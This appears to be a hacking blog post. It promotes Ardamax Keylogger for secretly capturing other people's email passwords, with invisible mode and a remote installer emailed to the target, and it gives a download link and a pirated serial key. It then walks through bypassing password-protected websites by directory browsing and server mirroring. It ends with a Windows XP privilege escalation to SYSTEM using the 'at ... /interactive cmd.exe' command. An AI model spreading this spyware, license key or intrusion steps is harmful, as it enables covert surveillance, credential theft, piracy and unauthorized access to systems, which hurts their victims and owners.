BlackHat security

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security- allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Download:
http://rapidshare.com/files/47779604/Setup.rar
[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]

Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT

Warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a ‘games’ directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can’t get past an opening “PasswordRequired” box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it’s hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don’t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let’s say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

really that is possible !

u know why is it a “user” account because it lacks come service layer than that in “administrator” account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:

You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the “Windows” drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the “Program Files” directory is a startup app. The call to “Program Files”, will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.

Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.

Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe

A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in.

System user name on start menu

explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.

ADMINISTRATOR IN WELCOME SCREEN.

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the “Welcome Screen” does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the “Win2000 Logon Screen Tweak” ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it’s Value data. Close the registry editor and restart.

dont hack others buddy be ethical !!!  ... lolz ;)